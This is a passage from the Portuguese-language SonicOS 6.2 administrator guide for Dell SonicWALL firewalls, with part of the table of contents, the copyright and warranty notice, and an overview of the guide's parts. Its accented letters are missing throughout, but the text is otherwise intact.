Viso geral do Clustering ativo/ativo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1114
Configurar o Clustering ativo/ativo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1129
Verificar a configurao de Clustering ativo/ativo . . . . . . . . . . . . . . . . . . . . . . 1139
Monitoramento da Alta disponibilidade do IPv6 . . . . . . . . . . . . . . . . . . . . . . . 1142
Definindo configuraes da interface e DHCP de rede. . . . . . . . . . . . . . . . . . 1143
Malha completa de clustering ativo/ativo. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1148
Parte 18. Servios de segurana

Captulo 62. Gerenciando Servios de segurana do SonicWALL . . . . . . . . . . . 1157
Servios de segurana do SonicWALL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1157
Resumo dos servios de segurana . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1158
Gerenciando servios de segurana online . . . . . . . . . . . . . . . . . . . . . . . . . . 1159
Configurando Servios de segurana . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1160
Ativando servios de segurana . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1163
Captulo 63. Configurando o Content Filtering Service . . . . . . . . . . . . . . . . . . . . 1165
Servios de segurana > Filtro de contedo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1165
Implementao do SonicWALL CFS com Regras de aplicativo . . . . . . . . . . . 1166
Servio de filtragem de contedo de herana . . . . . . . . . . . . . . . . . . . . . . . . . 1167
Viso geral de Gerenciamento de Poltica CFS 3.0 . . . . . . . . . . . . . . . . . . . . 1167
Exemplos de configurao do CFS 3.0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1170
Exemplos de filtragem de contedo de herana . . . . . . . . . . . . . . . . . . . . . . . 1175
Configurando as propriedades de filtro do SonicWALL herdado . . . . . . . . . . 1179
Configurando a filtragem de contedo Websense Enterprise . . . . . . . . . . . . . 1189
| 17
YouTube for School no suporte de filtragem de contedo . . . . . . . . . . . . . . . 1190
Captulo 64. Ativando o SonicWALL Client Anti-Virus . . . . . . . . . . . . . . . . . . . . . 1199
Servios de segurana > Antivrus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1199
Ativando o cliente antivrus do SonicWALL. . . . . . . . . . . . . . . . . . . . . . . . . . . 1199
Ativando uma AVALIAO GRATUITA do SonicWALL Client Anti-Virus . . . 1200
Configurando o servio do Client Anti-Virus . . . . . . . . . . . . . . . . . . . . . . . . . . 1201
Captulo 65. Configurao de Imposio do CF do cliente . . . . . . . . . . . . . . . . . 1203
Servios de segurana > Imposio do CF do cliente . . . . . . . . . . . . . . . . . . . . . 1203
Habilitao e configurao da Client CF Enforcement . . . . . . . . . . . . . . . . . . 1204
Habilitao do CFS do cliente em zonas da rede . . . . . . . . . . . . . . . . . . . . . . 1206
Captulo 66. Gerenciamento de Gateway do SonicWALL
Servio de antivrus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1209
Servios de segurana > Antivrus do Gateway . . . . . . . . . . . . . . . . . . . . . . . . . . 1209
Abordagem em vrias camadas do SonicWALL GAV . . . . . . . . . . . . . . . . . . 1210
Downloads de arquivo HTTP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1211
Arquitetura do SonicWALL GAV . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1212
Criando uma conta no mysonicwall.com . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1214
Registrando seu dispositivo de segurana de rede Dell SonicWALL . . . . . . . 1215
Ativando a licena do Gateway Anti-Virus, Anti-spyware e IPS . . . . . . . . . . . 1215
Ativando AVALIAES GRATUITAS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1217
Configurando a proteo SonicWALL Gateway Anti-Virus . . . . . . . . . . . . . . . 1217
Ativando o SonicWALL GAV . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1218
Aplicando a proteo SonicWALL GAV em interfaces . . . . . . . . . . . . . . . . . . 1218
Aplicando a proteo SonicWALL GAV em zonas . . . . . . . . . . . . . . . . . . . . . 1218
Visualizando informaes de status do SonicWALL GAV. . . . . . . . . . . . . . . . 1219
Atualizando assinaturas do GAV do SonicWALL . . . . . . . . . . . . . . . . . . . . . . 1220
Especificando filtragem de protocolo. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1220
Habilitando inspeo de entrada . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1221
Habilitando a inspeo de sada . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1221
Restringindo transferncia de arquivos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1222
Definindo as configuraes do gateway AV . . . . . . . . . . . . . . . . . . . . . . . . . . 1223
Configurando notificao sem cliente HTTP . . . . . . . . . . . . . . . . . . . . . . . . . . 1223
Configurando uma lista de excluso de SonicWALL GAV . . . . . . . . . . . . . . . 1224
Banco de dados do antivrus na nuvem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1224
Exibindo assinaturas do GAV do SonicWALL . . . . . . . . . . . . . . . . . . . . . . . . . 1225
Captulo 67. Ativando o Intrusion Prevention Service . . . . . . . . . . . . . . . . . . . . . 1229
Servios de Segurana > Intrusion Prevention Service . . . . . . . . . . . . . . . . . . . . 1229
Viso geral do Servio de preveno contra invases . . . . . . . . . . . . . . . . . . 1229
Configurando o Servio de preveno contra invases . . . . . . . . . . . . . . . . . 1237
Captulo 68. Ativando o servio anti-spyware . . . . . . . . . . . . . . . . . . . . . . . . . . . 1247
Servios de segurana > Anti-spyware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1247

Viso geral do anti-Spyware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1247
Ativao do SonicWALL Gateway Antivirus, Antispyware e IPS. . . . . . . . . . . 1248
Criando uma conta no mysonicwall.com . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1249
Registro de seu dispositivo de segurana de rede Dell SonicWALL. . . . . . . . 1250
Ativao de AVALIAES GRATUITAS . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1251
Ativao da licena do Gateway Anti-Virus, Anti-Spyware e IPS . . . . . . . . . . 1251
Ativao da proteo do servio anti-spyware . . . . . . . . . . . . . . . . . . . . . . . . 1253
Captulo 69. Configurando o SonicWALLLista negra em tempo real . . . . . . . . . . 1263
Filtragem de lista negra em tempo real . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1263
Captulo 70. Configurando os filtros de Geo-IP e Botnet . . . . . . . . . . . . . . . . . . . 1265
Servios de segurana > Filtro Geo-IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1265
Objeto de excluso de Geo-IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1267
Configuraes da pgina de bloqueio da Web . . . . . . . . . . . . . . . . . . . . . . . . 1267
Diagnsticos de Filtro Geo-IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1268
Servios de segurana > Filtro de botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1269
Verificando a localizao geogrfica e o status do servidor de botnet . . . . . . 1270
Objeto de excluso de botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1270
Configuraes da pgina de bloqueio da Web . . . . . . . . . . . . . . . . . . . . . . . . 1270
Diagnsticos de Filtro de botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1271
Parte 19. Acelerao de WAN

Captulo 71. Acelerao de WAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1275
Viso geral de Acelerao de WAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1275
Acelerao de WAN > Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1276
Acelerao de WAN > Acelerao de TCP . . . . . . . . . . . . . . . . . . . . . . . . . . . 1277
Acelerao de WAN > acelerao de WFS . . . . . . . . . . . . . . . . . . . . . . . . . . 1277
Acelerao de WAN > Cache da Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1278
Acelerao de WAN > Sistema . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1279
Acelerao de WAN > Log . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1279
Parte 20. AppFlow

Captulo 72. Configurar o AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1283
AppFlow > Relatrios de fluxo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1283
Estatsticas do relatrio de fluxo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1284
Configuraes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1284
Configuraes do servidor AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1285
Configuraes do coletor externo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1285
Configuraes de relatrios de conexo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1287
Outras configuraes de relatrios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1288
Informaes de ativao e implantao do NetFlow. . . . . . . . . . . . . . . . . . . . 1288
Tarefas de configurao do usurio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1289
Tabelas do NetFlow. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1293
| 19
Tabelas dinmicas. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1294
AppFlow > Servidor GMSFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1299
AppFlow > Servidor AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1301
Definir configuraes do servidor AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . 1302
Verificar a configurao do servidor AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . 1302
Implantar um servidor AppFlow de coletor externo . . . . . . . . . . . . . . . . . . . . . 1304
Visualizar os monitores de AppFlow a partir de um servidor AppFlow . . . . . . 1305
AppFlow > Monitor em tempo real . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1313
AppFlow > Trao AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1314
AppFlow > Monitor de AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1314
AppFlow > Relatrios AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1314
Parte 21. Registrar

Captulo 73. Gerenciando eventos de log . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1317
Log > Monitoramento de log . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1317
Gerenciamento dos eventos de log. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1318
Funes da tabela do Monitor de log . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1320
Captulo 74. Definindo configuraes de log . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1329
Log > Configuraes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1329
Gravidade/prioridade do log . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1330
Captulo 75. Definir configuraes de syslog . . . . . . . . . . . . . . . . . . . . . . . . . . . 1341
Log > Syslog . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1341
Configuraes de syslog . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1342
Captulo 76. Configurar automao de log . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1347
Log > Automao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1347
Automao de log de e-mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1348
Notificao por e-mail da verificao de integridade. . . . . . . . . . . . . . . . . . . . 1348
Configuraes do servidor de e-mail. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1349
Solera Capture Stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1350
Captulo 77. Configurar resoluo de nome . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1353
Log > Resoluo de nome . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1353
Selecionar configuraes de resoluo de nome . . . . . . . . . . . . . . . . . . . . . . 1354
Especificar o servidor DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1354
Captulo 78. Gerar relatrios de registros . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1355
Log > Relatrios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1355
Coleta de dados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1356
Visualizar dados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1356
Captulo 79. Configurar o analisador de log . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1357
Log > Analisador de log. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1357

Parte 22. Anexos
Apndice A. Guia de referncia de CLI . . . . . . . . . . . . . . . . . . . . . . . . . . 1361
Guia de CLI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1361
Convenes do texto. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1361
Especificao do formato de dados de entrada . . . . . . . . . . . . . . . . . . . . . . . 1362
Especificao de prompts da CLI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1362
Recursos de edio e concluso. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1362
Hierarquia de comandos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1364
Segurana da configurao. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1364
Senhas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1364
Redefinio de fbrica. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1364
Mtodos de gerenciamento para o dispositivo de segurana de rede
SonicWALL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1364
Iniciar uma sesso de gerenciamento utilizando a CLI . . . . . . . . . . . . . . . . . . 1365
Fazer login na CLI do SonicOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1366
Configurar o dispositivo de segurana de rede Dell SonicWALL . . . . . . . . . . 1366
Exemplo: Configurar uma VPN site a site usando a CLI. . . . . . . . . . . . . . . . . 1370
Apndice B. Roteamento avanado do BGP . . . . . . . . . . . . . . . . . . . . . . 1375
Roteamento avanado do BGP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1375
Viso geral do BGP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1375
Avisos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1382
Configurar o BGP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1383
Verificar a configurao do BGP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1394
BGP IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1397
Termos de BGP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1418
Apndice C. Usar os assistentes de configurao SonicWALL . . . . . . 1419
Assistentes > Assistente de configurao. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1419
Usar o assistente de configurao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1420
Configurar um endereo IP esttico com NAT habilitada . . . . . . . . . . . . . . . . 1420
Iniciar o assistente de configurao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1420
Assistentes > Assistente de servidor pblico . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1425
Assistentes > Assistente de VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1429
Usar o assistente de poltica de VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1430
Conectar os clientes de VPN globais . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1434
Configurar um VPN site a site usando o assistente de VPN. . . . . . . . . . . . . . 1434
Assistentes > Assistente de regras de aplicativos . . . . . . . . . . . . . . . . . . . . . . . . 1439
Apndice D. IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1443
IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1443
Viso geral do recurso. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1443
Configurar o IPv6. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1453
| 21
Visualizao de IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1498
Monitoramento de alta disponibilidade de IPv6. . . . . . . . . . . . . . . . . . . . . . . . 1499
Monitoramento e diagnstico de IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1500

Parte 1
Introduo
| 23
Prefcio
Prefcio
Aviso de direitos autorais

2014 Dell SonicWALL, Inc.
Todos os direitos reservados.
Segundo as leis de direitos autorais, este manual ou o software aqui descritos no podem ser
copiados, no seu todo ou em parte, sem autorizao por escrito do fabricante, exceto no uso
normal do software para fazer uma cpia de backup. Os avisos de direitos autorais e de
proprietrio mencionados devem ser includos em todas as cpias autorizadas conforme no
original. Essa exceo no permite que sejam efetuadas cpias para terceiros, sejam elas
vendidas ou no. Porm, todo o material comprado (com todas as cpias de backup) pode ser
vendido, oferecido ou emprestado a terceiros. Segundo a lei, as cpias incluem tambm
tradues para outros idiomas ou formatos.
As especificaes e descries esto sujeitas a atualizao sem aviso prvio.
Garantia limitada
Todos os dispositivos Dell SonicWALL vm com um ano de Garantia Limitada de Hardware,
que fornece entrega de peas de reposio importantes para peas defeituosas na garantia.
Alm disso, para 90 dias a contar da data de incio da garantia, alguns dispositivos Dell
SonicWALL tm direito a uma Garantia Limitada de Software, que fornece correes,
atualizaes e quaisquer verses de manuteno que ocorrerem durante o perodo de
cobertura. Visite a pgina de Informaes de garantia em
http://www.sonicwall.com/us/support/Services.html#tab=warranty
para obter detalhes sobre a garantia do produto.
Prefcio | 25
Sobre este guia
Bem-vindo ao Guia do Administrador do SonicOS 6.2 Este manual fornece as informaes que
voc precisa para ativar, configurar e administrar com xito os dispositivos de segurana de
rede Dell SonicWALL executando o SonicOS 6.2.
NSA 6600
NSA 5600
NSA 4600
NSA 3600
NSA 2600
SuperMassive 9600
SuperMassive 9400
SuperMassive 9200
Organizao deste guia

O Guia do Administrador do SonicOS 6.2 est estruturado nas seguintes partes que seguem
a estrutura de Interface de Gerenciamento na Web do SonicOS. Dentro dessas partes,
captulos individuais correspondem ao layout de interface de gerenciamento do SonicOS.
Parte 1 Introduo
Esta parte fornece uma viso geral dos novos recursos do SonicOS, convenes do guia,
informaes de suporte e uma viso geral da interface de gerenciamento do SonicOS.
Parte 2 Painel
O Painel de visualizao oferece aos administradores uma interface eficaz e eficiente para
monitorar visualmente a rede em tempo real, oferecendo eficientes grficos de fluxo de dados
em tempo real, regras personalizveis e configuraes flexveis de interface.
A parte de Painel contm as seguintes sees:
Monitor Multi-Core Exibe as estatsticas atualizadas dinamicamente da utilizao dos
ncleos individuais do Dispositivo de Segurana da Dell SonicWALL.
Monitor em tempo real Fornece aos administradores uma exibio multifuncional e
inclusiva, com informaes sobre aplicativos, uso de largura de banda, taxa de pacotes,
tamanho de pacote, taxa de conexo, contagem de conexes e monitoramento de vrios
ncleos.
Painel AppFlow Fornece as mesmas informaes fornecidas em Painel > Relatrios
AppFlow. Somente no Painel AppFlow as informaes so mostradas em grficos para o
primeiro de dez itens em cada categoria.
Monitoramento de AppFlow Fornece aos administradores de rede dados em tempo
real de entrada e sada. Vrios modos de exibio e opes personalizveis na Interface
de Monitoramento de AppFlow ajudam a visualizar os dados de trfego por aplicativos,
usurios, URLs, iniciadores, respondentes, ameaas, VoIP, VPN, dispositivos ou por
contedo.
Relatrios de AppFlow Fornece aos administradores relatrios agendados
configurveis por aplicativos, vrus, invases, spyware e classificao de URL. Estatsticas
de Relatrios de AppFlow permitem que os administradores de rede exibam um relatrio
agregado de nvel superior do que est acontecendo em sua rede.

Relatrios de ameaas Fornece relatrios sobre os dados mais recentes de ameaas
e proteo de um nico dispositivo Dell SonicWALL e dados de proteo de ameaa
agregados de Dispositivos de Segurana da Dell SonicWALL implantados em todo o
mundo.
Monitor de usurio Exibe detalhes de todas as conexes de usurio para o Dispositivo
de Segurana da Dell SonicWALL.
Monitoramento de BWM Exibe o gerenciamento por largura de banda por interface
para trfego de rede de ingresso e egresso. Os grficos de monitor BWM esto disponveis
para configuraes de poltica em tempo real, mais alto, alto, mdio-alto, mdio-baixo,
baixo e mais baixo.
Monitor de usurio Exibe detalhes de todas as conexes ativas para o Dispositivo de
Segurana da Dell SonicWALL.
Monitor de pacote Permite que voc monitore pacotes de dados individuais que
cruzam seu firewall. Os pacotes podem ser monitorados ou espelhados. Os pacotes
monitorados contm informaes de dados e de endereamento.
Monitoramento de log Fornece rastreamento de log de evento para ameaas de
segurana em potencial. O log exibido em uma tabela e pode ser classificado por coluna.
O Dispositivo de Segurana Dell SonicWALL pode alert-lo de eventos importantes, como
um ataque no firewall.
Parte 3 Sistema
Esta parte abrange controles de firewall variados para gerenciamento de informaes de status
do sistema, registro de firewall, ativao e gerenciamento de licenas, configurao de opes
de gerenciamento, gerenciamento de verses de firmware e uso de ferramentas de diagnstico
para soluo de problemas.
A parte de Sistema contm as seguintes sees:
Status Fornece informaes do sistema, como verso de firmware e tempo de atividade
do sistema, status de licena dos servios, mensagens de alerta de lmina por firewall e
atribuies de zona de interface de rede e status do link.
Licenas Descreve como ativar, fazer upgrade ou renovar licenas dos Servios de
segurana Dell SonicWALL. Nessa pgina, voc pode gerenciar todos os Servios de
segurana Dell SonicWALL licenciados para seu Dispositivo de Segurana Dell
SonicWALL.
Administrao Fornece definies para a configurao do Dispositivo de Segurana
da Dell SonicWALL para o gerenciamento remoto e seguro. Voc pode gerenciar o firewall
usando uma variedade de mtodos, incluindo HTTPS, SNMP ou Dell SonicWALL GMS.
Certificados Descreve como implementar o uso de certificados para polticas de VPN
e como localizar fontes para certificados de CA vlidos de servios de autoridade de
certificao de terceiros.
Hora Descreve como definir as configuraes de data e hora para eventos de log de
carimbo de data/hora, como atualizar automaticamente os servios de segurana e como
usar data e hora para outros fins internos.
Cronogramas Descreve como criar e gerenciar objetos para impor horrios de agenda
para uma variedade de recursos de firewall.
Configuraes Descreve como gerenciar as preferncias e verses do SonicOS do seu
firewall.
Monitor de pacote Descreve como monitorar pacotes de dados individuais que cruzam
seu firewall. O recurso de monitoramento de pacote fornece a funcionalidade para
examinar o trfego de rede sem o uso de utilitrios externos.
Diagnstico Fornece vrias ferramentas de diagnsticos que ajudam a solucionar
problemas de rede, bem como Conexes ativas, CPU e Monitores de processos.
| 27
Reiniciar Fornece instrues sobre como reiniciar o firewall a partir da interface de
Gerenciamento da Web.
Parte 4 Rede
Esta parte cobre a configurao do Dispositivo de segurana Dell SonicWALL para o seu
ambiente de rede. A seo de Rede da interface de gerenciamento inclui:
A parte de Rede contm as seguintes sees:
Interfaces Configura interfaces lgicas para conectividade. Configurar objetos de
interface que esto vinculados diretamente a interfaces fsicas. O esquema do SonicOS de
endereamento de interface funciona em conjunto com zonas de rede e objetos de
endereo.
Failover e LB Configura uma das interfaces definidas pelo usurio para agir como uma
porta WAN secundria para backup ou balanceamento de carga.
Zonas Configura zonas de segurana em sua rede.
DNS Define os servidores DNS para a resoluo de nome.
Objetos de endereos Configura host, rede e objetos de endereo. Objetos de
endereos uma das quatro classes de objeto (Endereo, Usurio, Servio e Cronograma)
no SonicOS. Esses Objetos de endereos permitem que entidades sejam definidas uma
vez e novamente sejam usadas em vrias instncias referenciais por toda a interface do
SonicOS.
Servios Configura objetos de servios a serem usados em regras de acesso de rede
para permitir ou negar o trfego para a rede. O Dispositivo de Segurana Dell SonicWALL
inclui os servios Padro. Os servios Padro so servios predefinidos que no so
editveis. E voc tambm pode criar Servios personalizados para configurar os servios
de firewall de forma a atender suas necessidades de negcios especficas.
Roteamento Visualiza a Tabela de Rota, Cache de ARP e configura o roteamento
esttico e dinmico por interface.
Polticas de NAT Cria polticas de NAT incluindo Um-para-um NAT, Muitos-para-um
NAT, Muitos-para-muitos NAT ou Um-para-muitos NAT.
ARP Visualiza as configuraes de ARP, limpa o cache de ARP e configura o tempo de
cache de ARP.
Antifalsificao de MAC-IP Configura a proteo Antifalsificao de MAC-IP no
SonicOS.
Servidor DHCP Configura o firewall como um Servidor DHCP na rede para atribuir
dinamicamente endereos IP a computadores em suas zonas LAN ou DMZ.
Auxiliar de IP Configura o firewall para encaminhar solicitaes DHCP com origem em
interfaces no firewall para um servidor centralizado em nome do cliente solicitante.
Proxy da Web Configura o firewall para encaminhar automaticamente todas as
solicitaes de proxy da Web para um servidor de proxy da rede.
DNS dinmico Configura o firewall para registrar dinamicamente seu endereo IP de
WAN com um provedor DDNS.
Monitoramento de rede Monitora a viabilidade do caminho de rede. Os resultados e
status deste monitoramento so exibidos dinamicamente na pgina de Monitoramento de
rede e so tambm fornecidos para componentes de cliente afetados e registrados no log
do sistema. Cada poltica de Monitoramento de rede personalizada define um destino de
Objeto de endereo a ser analisado. Este Objeto de endereo pode ser um Host, Grupo,
Intervalo ou FQDN. Quando o Objeto de endereo de destino for um Grupo, Intervalo ou
FQDN com vrios endereos resolvidos, o Monitoramento de rede investiga o destino de
investigao e deriva o estado da Poltica de Monitoramento de rede com base nos
resultados.

Parte 5 SonicPoint
O Dell SonicWALL SonicPoints so pontos de acesso sem fio especialmente projetados para
funcionarem com dispositivos de segurana SonicWALL UTM para fornecer acesso sem fio em
uma empresa.
A parte de SonicPoint contm as seguintes sees:
SonicPoint SonicPoints Descreve como usar o SonicPoints (pontos de acesso sem
fio) com dispositivos de segurana Dell SonicWALL para fornecer acesso sem fio em toda
a empresa e como gerenciar os SonicPoints conectados ao seu sistema.
Status da estao Exibe relatrios das estatsticas de cada SonicPoint.
Servios de deteco de intruso Exibe relatrios sobre todos os pontos de acesso
que podem ser encontrados atravs da varredura de banda de rdio 802.11a, 802.11g e
802.11n no SonicPoints.
Pontos de acesso virtuais Permite que vrios pontos de acesso virtuais existam em
um ponto nico de acesso fsico.
Monitoramento por RF Oferece monitoramento em tempo real do trfego de RF para
ameaas e fornece informaes para ajudar a utilizar melhor a largura de banda sem fio
com SonicPoints.
Anlise de RF Descreve como usar o recurso de Anlise de RF para utilizar melhor a
largura de banda sem fio com os dispositivos SonicPoint e SonicPoint-N.
Fairnet Fornece um mtodo fcil de usar para os administradores de rede controlarem
a largura de banda de clientes sem fio associados e verifica se ela distribuda
uniformemente entre eles. Os administradores podem configurar os limites de largura de
banda do SonicPoint FairNet para todos os clientes sem fio, intervalos de endereo IP
especficos ou clientes individuais para fornecer eficincia justa na rede.
Parte 6 Firewall
Esta parte descreve as Regras de acesso e Regras de aplicativos, que so polticas
especficas de aplicativos que fornecem controle granular sobre o trfego de rede ao nvel dos
usurios, usurios de e-mail, programaes e sub-redes de IP. A funcionalidade principal deste
recurso de camada de aplicativo regular a navegao na Web, a transferncia de arquivos,
as mensagens de e-mail e os anexos de e-mail.
A parte de Firewall contm as seguintes sees:
Regras de acesso
Regras de aplicativos
Controle de aplicativos avanado
Objetos de correspondncia
Objetos de ao
Objetos de endereos
Objetos de servio
Objetos de endereo de e-mail
Parte 7 Configuraes de firewall

Esta parte descreve as ferramentas de gerenciamento de como o Dispositivo de Segurana
Dell SonicWALL trata o trfego atravs do firewall.
A parte de Configuraes de Firewall contm as seguintes sees:
Avanado
| 29
BWM
Proteo contra inundao
Difuso seletiva
Mapeamento QoS
Controle de SSL
Parte 8 DPI-SSL
Esta parte descreve o recurso de Deep Packet Inspection of Secure Socket Layer (DPI-SSL)
para permitir a inspeo de trfego HTTPS criptografado e outro trfego baseado em SSL.
A parte de DPI-SSL contm as seguintes sees:
Cliente SSL O Cliente DPI-SSL usado para inspecionar o trfego HTTPS quando os
clientes na LAN do firewall do Dispositivo de Segurana Dell SonicWALL acessam
contedo localizado na WAN.
Servidor SSL O Servidor DPI-SSL usado para inspecionar o trfego HTTPS quando
clientes remotos estabelecem uma conexo por meio de WAN para acessar o contedo
localizado na LAN do Dispositivo de Segurana da Dell SonicWALL.
Parte 9 VoIP
Esta parte fornece instrues para configurar o Dispositivo de Segurana Dell SonicWALL para
oferecer suporte a conexes H.323 ou SIP Voice over IP (VoIP).
A parte de VoIP contm as seguintes sees:
Configuraes
Status de chamada
Parte 10 Anti-spam
Esta parte fornece um mtodo rpido, eficiente e eficaz de adicionar recursos anti-spam,
anti-phishing e antivrus ao seu firewall existente.
A parte de anti-spam contm as seguintes sees:
